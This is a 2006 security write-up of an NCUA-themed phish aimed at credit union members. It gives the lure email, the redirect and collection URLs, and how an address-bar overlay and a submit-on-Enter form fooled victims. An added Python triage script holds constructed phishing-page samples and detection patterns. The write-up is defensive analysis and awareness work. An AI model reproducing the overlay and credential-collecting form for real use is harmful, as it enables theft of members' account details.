

NCUA Phish Using URL overlay code to fool members


AUSTIN, TEXAS - February 10, 2006

Author:
John Brozycki, CISSP
Hudson Valley FCU

ABSTRACT:
A current NCUA (National Credit Union Administration) phish was observed on 2/8/2006. This phish attempts to get ANY credit union member to enter personal account information. This phish features several redirects, a drop down menu that includes more than 2,300 federal credit unions, as well as code to obscure the real URL and cover it with the apparent URL of the true ncua.gov website. The fake websites were taken down by 8:30am EST on 2/8/2006.

ORIGINAL MESSAGE BODY:

LEGAL NOTICE

Message sent to you follows:

Dear NCUA client,

As part of our security measures, we regularly screen activity in Federal Credit Unions (FCU) network.For your protection, we have limited access to your account until additional security measures can be completed. We apologize for any inconvenience this may cause. Please log in to your FCU account to restore your access as soon as possible.

We apologies for any inconvinience this may caused you and we strongly advise you to update your information you have on file with us. Please update in order to avoid any possible futuring billing problems with your account.

Best regards, - NCUA Team.

SUMMARY:

This message was forwarded to us; the original headers are not available. The original email is HTML, and the word UPDATE in the final sentence is a hyperlink to "http://www.labs.cl/homepage.html", which in turn redirects to "http://www.addina.com/login/". The addina.com page displays a "page loading" progress bar and instructs the user to click a link if the page doesn't load, which it never does; nothing happens until the user clicks that link. It then appears to use a variable to direct the browser within http://www.addina.com/login/, but it uses code to obscure the true URL in the address bar (or to hide the address bar, depending upon the browser). The form is set to submit on a carriage return: pressing Enter in a field sends the data, so the phisher doesn't have to wait for a POST triggered by the user clicking a submit button. As the server-side PHP code is not accessible, no further information is available (i.e., the destination email addresses the information is likely submitted to).

The fake URL that the code uses to overlay the address field with is: “https://www.ncua.gov/cgi-bin/accounts.asp?act=update&uid=42341”

Things to notice: there is no "lock" icon indicating an SSL connection even though the URL shows "https:". Further, the title bar says "Welcome to VisionLine." A view of your network socket connections (the netstat command in Windows) shows no connection on port 443 and no connection to NCUA, only to www.addina.com (200.55.199.149). The image displayed in the email is actually hosted at "http://www.geocities.com/slutsd/BLUELAB.gif"; this geocities link is no longer valid.

In the Safari browser, the URL address bar is hidden (apparently it is not easy to overlay text on the address bar in this browser). In IE, if you click the address bar's drop-down menu, the address bar is hidden. If you then select VIEW -> TOOLBARS -> ADDRESS BAR, the address bar returns and you can see the true URL.

Phishers have definitely taken it up a notch with this one!

The site was taken down at roughly 8:30am EST. HVFCU had sent a cease-and-desist email to the addina.com domain. It is unknown whether the site operators were previously aware of fake content being hosted on their server or whether the removal was a result of this notification.

CONCLUSIONS:

  • Credit unions continue to be an active target for phishers.

  • Obfuscation of the address bar is ingenious and can and will easily fool people. No doubt we will see this technique again.

  • The techniques used with this phish illustrate how these attacks are becoming increasingly complex and more difficult to recognize as being fakes.

DETAILS:

Below is a sample form screen from the NCUA phish; graphics are not present. Because the site was taken down before we got a screen shot, it was recreated from cached data in an IE sandbox environment preserved after the takedown. (Note: the [1] after the html file names below is added by IE when it caches files and is generally not part of the real file name on the hosting server. It is used here for consistency.)

The above screen shot is of "update[1].htm", which is the code for the form submission page. Note the drop-down box for "bank name." The list contains 2,354 federal credit unions, including Hudson Valley.

Here’s a more detailed explanation of what it’s doing.

1) The html email link, which appears to be going to ncua.gov, really goes to http://www.labs.cl/homepage.html, which redirects to http://www.addina.com/login/.

2) The redirect to addina.com loads login[1].htm. This code appears to use a variable, supplied by external code, to build the link to the desired URL. Nothing happens until the user clicks on the link:

    Please wait <img src="period_ani.gif"><br>
    <p class="notRedirected">(if you are not automatically redirected, click the following link)</p>
    <p class="pageMoved"><a href="javascript:redir('ncua_dll.php')">Click here</a> to redirect!



3) Clicking on the link results in forwarding to http://www.addina.com/login/update.php. Although we can't see what runs on the server side, we can see the effects from two of the html files. UPDATE[1].HTM produces the form page shown in the first screen shot, above. NCUA_DLL[1].HTM handles the fake URL. In fact, simply loading NCUA_DLL[1].HTM from disk into the IE browser yields the following:



While this doesn't look as intended, you can clearly see the faked address that is meant to overlay the true URL. Interestingly, this fake URL is a text box, not a graphic, so the user can click in it and type; it is not the real address field.
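The indicators called out in the Summary and in the Details above (an off-brand link behind the UPDATE text, a javascript: redirect link, a text box carrying a fake https: URL over the address bar, a form that submits on carriage return, and a window opened with the real address bar hidden) can be checked mechanically against saved copies of the email and the kit's pages. The following Python script is an added example written for this write-up; it is not code recovered from the phish and not code written by HVFCU or CUISPA. The two HTML samples embedded in it are constructed from the behaviours described above, not the recovered login[1].htm or ncua_dll[1].htm files, and the redir() body and the Enter-key handler in the kit sample are assumptions about how those files behaved.

```python
"""Static triage of a saved phish (HTML email plus the kit's client-side pages).
Added example for this write-up, not code recovered from the phish nor written by
HVFCU/CUISPA; the two samples are CONSTRUCTED from the behaviours described."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed stand-in for the HTML email: the UPDATE link points off-brand.
EMAIL_HTML = """<p>Dear NCUA client, please <a href="http://www.labs.cl/homepage.html">UPDATE</a>
your information.</p><img src="http://www.geocities.com/slutsd/BLUELAB.gif">"""

# Constructed stand-in for the kit pages.  The redir() body and the Enter-key
# handler are ASSUMPTIONS about the recovered files, not their actual code.
KIT_HTML = """<script>
function redir(u){ window.open(u, "_self", "location=no,toolbar=no"); }
</script>
<p><a href="javascript:redir('ncua_dll.php')">Click here</a> to redirect!</p>
<input type="text" style="position:absolute;top:0;left:80px;width:600px"
       value="https://www.ncua.gov/cgi-bin/accounts.asp?act=update&amp;uid=42341">
<form action="http://www.addina.com/login/update.php" method="post">
  <input name="acct" onkeypress="if(event.keyCode==13){this.form.submit();}">
</form>"""

class _Collector(HTMLParser):
    """Collect the few elements the checks in triage() look at."""
    def __init__(self):
        super().__init__()
        self.anchors, self.inputs, self.forms = [], [], []  # (href, text), attr dicts
        self.script = []          # inline <script> bodies plus on* handler attributes
        self._href, self._text, self._in_script = None, [], False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        self.script.extend(v for k, v in a.items() if k.startswith("on"))
        if tag == "a":
            self._href, self._text = a.get("href", ""), []
        elif tag == "input":
            self.inputs.append(a)
        elif tag == "form":
            self.forms.append(a)
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append((self._href, "".join(self._text).strip()))
            self._href = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script.append(data)
        elif self._href is not None:
            self._text.append(data)

def triage(html, claimed_hosts):
    """Return (indicator, detail) pairs for HTML that claims to come from one of
    claimed_hosts.  Each indicator is a behaviour the write-up observed."""
    p = _Collector()
    p.feed(html)
    found = []
    for href, text in p.anchors:
        if href.lower().startswith("javascript:"):
            # Navigation by script: the destination never shows in the status bar.
            found.append(("javascript_link", href))
            continue
        host = (urlparse(href).hostname or "").lower()
        if host and host not in claimed_hosts:
            found.append(("offbrand_link", f"{text or '(image)'} -> {host}"))
    for inp in p.inputs:
        # A text box pre-filled with a URL is the overlay trick: an address bar
        # drawn by the page rather than by the browser.
        if re.match(r"https?://", inp.get("value", ""), re.I):
            found.append(("fake_address_bar", inp["value"]))
    for form in p.forms:
        if form.get("action", "").lower().startswith("http://"):
            found.append(("plaintext_post", form["action"]))
    js = "\n".join(p.script)
    # Submit on carriage return: the form fires before the user reaches a button.
    if re.search(r"keyCode\s*==\s*13|\bkey\s*===?\s*.Enter.", js):
        found.append(("submit_on_enter", "Enter-key handler submits the form"))
    # A window opened with the browser's real address bar suppressed.
    if re.search(r"window\.open\([^)]*(location|toolbar)\s*=\s*(no|0)", js, re.I):
        found.append(("hidden_address_bar", "window.open with location/toolbar=no"))
    return found

if __name__ == "__main__":
    for name, sample in (("email", EMAIL_HTML), ("kit", KIT_HTML)):
        for indicator, detail in triage(sample, {"ncua.gov", "www.ncua.gov"}):
            print(f"{name}: {indicator:<18} {detail}")
```

Point triage() at the files saved from the IE cache rather than the embedded samples. A page that genuinely belongs to the claimed host produces no findings, so every hit is worth a manual look; the checks are deliberately simple string and attribute tests, which is all a takedown-day triage needs.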

To view the client-side code, examine the file ncua_dll[1].htm. Note: the following files should be attached with this document:

Login[1].htm (presents the "click here if page doesn't load" page.)
Update[1].htm (form entry page to gather personal account information.)
Ncua_dll[1].htm (creates the fake URL over the address bar field.)
Pdownclick[1].htm (appears to provide a 404 message, but its exact functionality is not known.)